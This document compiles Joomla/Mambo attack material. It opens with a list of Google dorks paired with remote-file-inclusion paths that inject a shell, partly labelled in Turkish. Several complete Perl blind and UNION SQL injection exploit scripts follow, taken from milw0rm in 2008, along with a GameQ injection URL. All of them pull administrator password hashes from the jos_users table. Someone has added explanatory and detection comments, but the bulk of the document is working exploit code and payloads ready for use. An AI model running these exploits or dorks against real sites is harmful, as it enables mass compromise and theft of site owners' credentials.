/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_comprofiler" Site Sonuna: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_zoom" Site Sonuna: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_serverstat" Site Sonuna: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_fm" Site 
Sonuna: components/com_fm/fm.install.php?lm_absolute_path=shell Google Dork: inurl:com_mambelfish Site Sonuna: administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell Google Dork: inurl:com_lmo Site Sonuna: components/com_lmo/lmo.php?mosConfig_absolute_path=shell Google Dork: inurl:com_linkdirectory Site Sonuna: administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=shell Google Dork: inurl:com_mtree Site Sonuna: components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell Google Dork: inurl:com_jim Site Sonuna: administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell Google Dork: inurl:com_webring Site Sonuna: administrator/components/com_webring/admin.webring.docs.php?component_dir=shell Google Dork: inurl:com_remository Site Sonuna: administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Google Dork: inurl:com_babackup Site Sonuna: administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell Google Dork: inurl:com_lurm_constructor Site Sonuna: administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell Google Dork: inurl:com_mambowiki Site Sonuna: components/com_mambowiki/MamboLogin.php?IP=shell Google Dork: inurl:com_a6mambocredits Site Sonuna: administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell Google Dork: inurl:com_phpshop Site Sonuna: administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell Google Dork: inurl:com_cpg Site Sonuna: components/com_cpg/cpg.php?mosConfig_absolute_path=shell Google Dork: inurl:com_moodle Site Sonuna: components/com_moodle/moodle.php?mosConfig_absolute_path=shell Google Dork: inurl:com_extended_registration Site Sonuna: components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell Code: Google Dork: 
inurl:com_mospray Site Sonuna: components/com_mospray/scripts/admin.php?basedir=shell Google Dork: inurl:com_bayesiannaivefilter Site Sonuna: /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:com_uhp Site Sonuna: /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell Google Dork: inurl:com_peoplebook Site Sonuna: /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell Google Dork: inurl:com_mmp Site Sonuna: /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell Google Dork: inurl:com_reporter Site Sonuna: /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell Google Dork: inurl:com_madeira Site Sonuna: /components/com_madeira/img.php?url=shell Google Dork: inurl:com_jd-wiki Site Sonuna: /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell Google Dork: inurl:com_bsq_sitestats Site Sonuna: /components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell Site Sonuna2: /com_bsq_sitestats/external/rssfeed.php?baseDir=shell Dork: com_comprofiler Expl: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_multibanners Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_colophon expl: administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=com_simpleboard Expl: /components/com_simpleboard/file_upload.php?sbp=[Shell] Dork: inurl:"com_hashcash" Expl: /components/com_hashcash/server.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_htmlarea3_xtd-c" Expl: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_sitemap" Expl: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell] -- Dork: inurl:"com_forum" Expl: /components/com_forum/download.php?phpbb_root_path=[Shell] -- Dork: inurl:"com_pccookbook" Expl: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=com_extcalendar Expl: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell] Dork: inurl:"minibb" Expl: /components/minibb/index.php?absolute_path=[Shell] - Dork: inurl:"com_smf" Expl: /components/com_smf/smf.php?mosConfig_absolute_path=[Shell] Expl: /modules/mod_calendar.php?absolute_path=[Shell] Dork: inurl:"com_pollxt" Expl: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_loudmounth" Expl: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_videodb" Expl: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=com_pcchess Expl: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_multibanners" Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_a6mambohelpdesk" Expl: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell] Dork: inurl:"com_colophon" Expl: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mgm" Expl: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mambatstaff" Expl: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_securityimages" Expl: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell] Expl: /components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_artlinks" Expl: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_galleria" Expl: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]
#!/usr/bin/perl
# Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit
# Author: His0k4 [ALGERIAN HaCkeR]  (milw0rm.com, 2008-06-01)
#
# NOTE(review): this page glues two separate programs together; the second
# one (for Joo!BB 0.5.9) starts at the second "#!/usr/bin/perl" below.  Save
# them as two files: run as one file, the second definition of istrue2()
# replaces the first at compile time and the first script's probes would be
# sent to the wrong component.
#
# How it works: the id= parameter of index.php?option=com_mycontent&task=view
# is concatenated into a SQL query unfiltered.  Each probe appends
#   and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),<pos>,1))=CHAR(<code>)
# and the response counts as "true" when it still contains the marker
# "E-mail".  The first user's 32-character hash is echoed one character at
# a time as it is found.
#
# Usage:   perl mycontent.pl host path [-r <id>] [-p proxyhost:port] [-u <n>]
# Example: perl mycontent.pl www.host.com /joomla/ -r 10
# -u is parsed but never used.  A position for which no candidate matches
# is skipped silently, so a hash shorter than 32 characters means the
# marker (regexp) or the id is wrong.
#
# Historical PoC kept for reference; only run against systems you are
# authorised to test.
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    print " \n";
    print " #############################################################\n";
    print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
    print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
    print " # #\n";
    print " # Conctact: His0k4.hlm[at]gamil.com #\n";
    print " # Greetz: All friends & muslims HacKeRs #\n";
    print " # Greetz2: http://www.palcastle.org/cc :) #\n";
    print " # #\n";
    print " # Usage: perl mycontent.pl host path <options> #\n";
    print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -r Valid id #\n";
    print " # Note: #\n";
    print " # If the exploit failed #\n";
    print " # Change 'regexp' value to the title of the page #\n";
    print " #############################################################\n";
    exit;
}
# Positional arguments are read before GetOptions() strips the options, so
# $rid may initially hold "-r"; the $options{"r"} assignment below fixes it.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"r"}) { $rid = $options{"r"}; }
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
# For each of the 32 hash positions try digits '0'..'9', then 'a'..'z'
# (only a-f can occur in an MD5 hash; the remaining letters cost requests).
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $rid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $rid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
# One probe: true (1) when the page for (position $i, character code $h)
# contains $regexp, else 0.  $uid is accepted but not used.  A new
# UserAgent (and proxy setting) is created on every call.
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $uid = shift;
    my $rid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    # Marker text that is present on a valid page; change it if the target
    # renders the page differently (see the usage banner).
    my $regexp = "E-mail";
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}
# milw0rm.com [2008-06-01]

# ---------------------------------------------------------------------------
# Second, separate program: Joomla Component JooBB 0.5.9 Blind SQL Injection
# Exploit (same author and structure; differs in the vulnerable parameter,
# forum=, in index.php?option=com_joobb&view=forum, and in the marker
# "Announcements").  Save it as its own file.
# ---------------------------------------------------------------------------
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    print " \n";
    print " #############################################################\n";
    print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n";
    print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
    print " # #\n";
    print " # Conctact: His0k4.hlm[at]gamil.com #\n";
    print " # Greetz: All friends & muslims HacKeRs #\n";
    print " # Greetz2: http://www.palcastle.org/cc :) #\n";
    print " # #\n";
    print " # Usage: perl jobb.pl host path <options> #\n";
    print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -f Forum id #\n";
    print " # Note: #\n";
    print " # If you need to change the match value so do it :D #\n";
    print " #############################################################\n";
    exit;
}
# Same argument handling as above: -f (forum id) overrides the third
# positional argument; -u is parsed but never used.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"f"}) { $fid = $options{"f"}; }
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $fid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $fid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
# One probe against the forum view; true (1) when the page for
# (position $i, character code $h) still contains "Announcements".
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $uid = shift;
    my $fid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    my $regexp = "Announcements";
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}
# milw0rm.com [2008-06-01] milw0rm.com
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex Code:
#!/usr/bin/perl
# Boolean-based blind SQL injection PoC (milw0rm, 2008) against the Joomla
# acctexp component.  A SUBSTRING(...)=CHAR(n) condition is appended to the
# `usage` query parameter and the first jos_users password hash is recovered
# one character at a time, judged by whether a marker string is in the
# response.  Arguments: host, path, then Getopt options -u (unused user id),
# -p (HTTP proxy host:port), -g (usage id).
# Detection: each probe is an unencoded GET carrying the literal
# "SUBSTRING((SELECT password FROM jos_users" fragment; up to 36 requests per
# character, 32 characters.  Application-side fix: cast the id parameter to
# int before it reaches SQL.  Note: no `use strict`/`use warnings`.
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    # Usage banner; the match string ($regexp below) is site-specific.
    print " \n";
    print " #############################################################\n";
    print " # Joomla Component acctexp Blind SQL Injection Exploit #\n";
    print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
    print " # #\n";
    print " # Conctact: His0k4.hlm[at]gamil.com #\n";
    print " # Greetz: All friends & muslims HacKeRs #\n";
    print " # Greetz2: http://www.palcastle.org/cc :) #\n";
    print " # #\n";
    print " # Usage: perl acctexp.pl host path <options> #\n";
    print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -g usage id #\n";
    print " # Note: #\n";
    print " # Don't forget to change the match if you have to do it :)#\n";
    print " #############################################################\n";
    exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;          # -u; passed to istrue2 but never used there
my $gid = $ARGV[2];      # file-scope; istrue2 reads this directly (see below)
my %options = ();        # file-scope; read again inside istrue2 for -p
GetOptions(\%options, "u=i", "p=s", "g=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"g"}) { $gid = $options{"g"}; }
# syswrite is unbuffered, so each recovered character shows immediately;
# 14 is the length of the label string.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;           # set once a candidate for position $i matches
    my $h = 48;          # '0'
    # Try '0'..'9' (48..57) first, then 'a'..'z' (97..122).  If no candidate
    # matches, nothing is printed for this position.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $gid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
        $h++;
    }
    if(!$f) {
        $h = 97;         # 'a'
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $gid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
# istrue2(host, path, uid, rid, i, h): one oracle probe.  Returns 1 when the
# response body contains $regexp, else 0.  $uid and $rid are bound but never
# read: the query interpolates the file-scope $gid (the same value the caller
# passes as the fourth argument).  The query string is sent unencoded.
sub istrue2 {
    my $host = shift; my $path = shift; my $uid = shift; my $rid = shift; my $i = shift; my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." 
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }   # optional -p proxy
    my $resp = $ua->get($query);
    my $content = $resp->content;
    my $regexp = "Verify Password";   # marker expected only on the "true" page; interpolated as a regex
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}
Joomla Component jotloader <= 1.2.1.a Blind SQL injection Code:
#!/usr/bin/perl
# Boolean-based blind SQL injection PoC (milw0rm, 2008) against the Joomla
# jotloader component.  A SUBSTRING(...)=CHAR(n) condition is appended to the
# `cid` query parameter and the first jos_users password hash is recovered
# one character at a time, judged by whether a marker string is in the
# response.  Arguments: host, path, then Getopt options -u (unused user id),
# -p (HTTP proxy host:port), -c (cid).
# Detection: each probe is an unencoded GET carrying the literal
# "SUBSTRING((SELECT password FROM jos_users" fragment; up to 36 requests per
# character, 32 characters.  Application-side fix: cast the id parameter to
# int before it reaches SQL.  Note: no `use strict`/`use warnings`.
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    # Usage banner.
    print " \n";
    print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    print " o Joomla Component jotloader Blind SQL Injection Exploit o\n";
    print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
    print " o o\n";
    print " o Conctact: His0k4.hlm[at]gamil.com o\n";
    print " o Greetz: All friends & muslims HacKeRs o\n";
    print " o o\n";
    print " o Dork : inurl:com_jotloader o\n";
    print " o Usage: perl jotloader.pl host path <options> o\n";
    print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n";
    print " o o\n";
    print " o Options: o\n";
    print " o -c valid cid id o\n";
    print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;          # -u; passed to istrue2 but never used there
my $cid = $ARGV[2];
my %options = ();        # file-scope; read again inside istrue2 for -p
GetOptions(\%options, "u=i", "p=s", "c=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"c"}) { $cid = $options{"c"}; }
# syswrite is unbuffered, so each recovered character shows immediately;
# 14 is the length of the label string.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;           # set once a candidate for position $i matches
    my $h = 48;          # '0'
    # Try '0'..'9' (48..57) first, then 'a'..'z' (97..122).  If no candidate
    # matches, nothing is printed for this position.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $cid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
        $h++;
    }
    if(!$f) {
        $h = 97;         # 'a'
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $cid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
# istrue2(host, path, uid, cid, i, h): one oracle probe.  Returns 1 when the
# response body contains $regexp, else 0.  $uid is accepted but never read;
# the local $cid shadows the file-scope one.  The query string is sent
# unencoded.
sub istrue2 {
    my $host = shift; my $path = shift; my $uid = shift; my $cid = shift; my $i = shift; my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." 
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }   # optional -p proxy
    my $resp = $ua->get($query);
    my $content = $resp->content;
    # Interpolated as a regex, so the '.' matches any character, not only
    # a literal dot.
    my $regexp = "files.download";
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}
# milw0rm.com [2008-06-04]
Joomla Component EasyBook 1.1 SQL Injection Exploit Joomla Component EasyBook 1.1 SQL Injection Exploit Code:
#!/usr/bin/perl
# UNION-based SQL injection PoC (milw0rm, 2008) against the Joomla EasyBook
# component.  Sends one raw HTTP/1.0 POST over a plain socket with an
# injected UNION SELECT in the `gbid` form field, then scans the response for
# a ':::'-delimited field (the 0x3A3A3A markers in the query) and prints it
# as login / hash / salt.  Reads the host and the `md` token from STDIN.
# Detection: a POST body containing an unencoded "union+select ... from
# jos_users/*" and a "Host: www.<host>" header sent to port 80 in clear text.
# Application-side fix: cast the id parameter to int before it reaches SQL.
use IO::Socket;
use strict;
##### INFO##############################
# Example: #
# Host: artsbymonique.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################
print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";
print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);
my ($socket,$lhs,$l,$h,$s);
# Plain TCP to port 80; the error message does not include $!.
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
# Content-Length is fixed at 214 although the body interpolates $md, so it
# is only accurate for one length of $md.  Headers are separated by "\n",
# not "\r\n".
print $socket "POST /index.php HTTP/1.0\n".
    "Host: www.$host\n".
    "Content-Type: application/x-www-form-urlencoded\n".
    "Content-Length: 214\n\n".
    "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
# Each iteration reads one line into $_ and a second line into $s; only $s
# is tested, so every other response line is skipped.
while(<$socket>) {
    $s = <$socket>;
    if($s=~/:::(.+):::/){
        $lhs = $1;
        # The extracted field is "username:password"; the password column is
        # expected to hold "hash:salt", giving three parts.
        ($l,$h,$s)=split(':',$lhs);
        print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
        close $socket;
        exit;
    }
}
die ("Exploit failed!");
POST only
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability Code: /---------------------------------------------------------------\ \ / / Joomla Component GameQ Remote SQL injection \ \ / \---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkEr] [*] POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL} [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit Code:
#!/usr/bin/perl
# Boolean-based blind SQL injection PoC (milw0rm, 2008) against the Joomla
# yvcomment component.  An ascii(SUBSTRING(...))=n condition is appended to
# the `ArticleID` query parameter and the first jos_users password hash is
# recovered one character at a time, judged by whether a marker string is in
# the response.  Arguments: host, path, then Getopt options -u (unused user
# id), -p (HTTP proxy host:port), -a (article id).
# Detection: each probe is an unencoded GET carrying the literal
# "SUBSTRING((SELECT password FROM jos_users" fragment; up to 36 requests per
# character, 32 characters.  Application-side fix: cast the id parameter to
# int before it reaches SQL.  Note: no `use strict`/`use warnings`.
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1]) {
    # Usage banner; the match string ($regexp below) is site-specific.
    print " \n";
    print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n";
    print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
    print " o o\n";
    print " o Conctact: His0k4.hlm[at]gamil.com o\n";
    print " o Greetz: All friends & muslims HacKeRs o\n";
    print " o o\n";
    print " o Dork : inurl:yvcomment o\n";
    print " o Usage: perl yvcomment.pl host path <options> o\n";
    print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n";
    print " o o\n";
    print " o Options: o\n";
    print " o -a valid Article id o\n";
    print " o Note: o\n";
    print " o You can Change the match string by any content of the correct query o\n";
    print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;          # -u; passed to istrue2 but never used there
my $aid = $ARGV[2];
my %options = ();        # file-scope; read again inside istrue2 for -p
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"a"}) { $aid = $options{"a"}; }
# syswrite is unbuffered, so each recovered character shows immediately;
# 14 is the length of the label string.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;           # set once a candidate for position $i matches
    my $h = 48;          # '0'
    # Try '0'..'9' (48..57) first, then 'a'..'z' (97..122).  If no candidate
    # matches, nothing is printed for this position.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
        $h++;
    }
    if(!$f) {
        $h = 97;         # 'a'
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $aid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";
# istrue2(host, path, uid, aid, i, h): one oracle probe.  Returns 1 when the
# response body contains $regexp, else 0.  $uid is accepted but never read;
# the local $aid shadows the file-scope one.  The trailing .""  on the query
# appends an empty string and has no effect.  The query string is sent
# unencoded.
sub istrue2 {
    my $host = shift; my $path = shift; my $uid = shift; my $aid = shift; my $i = shift; my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." 
and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
    if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }   # optional -p proxy
    my $resp = $ua->get($query);
    my $content = $resp->content;
    my $regexp = "DateAndAuthor";   # marker expected only on the "true" page; interpolated as a regex
    if($content =~ /$regexp/) { return 1; } else { return 0; }
}
# milw0rm.com [2008-06-08]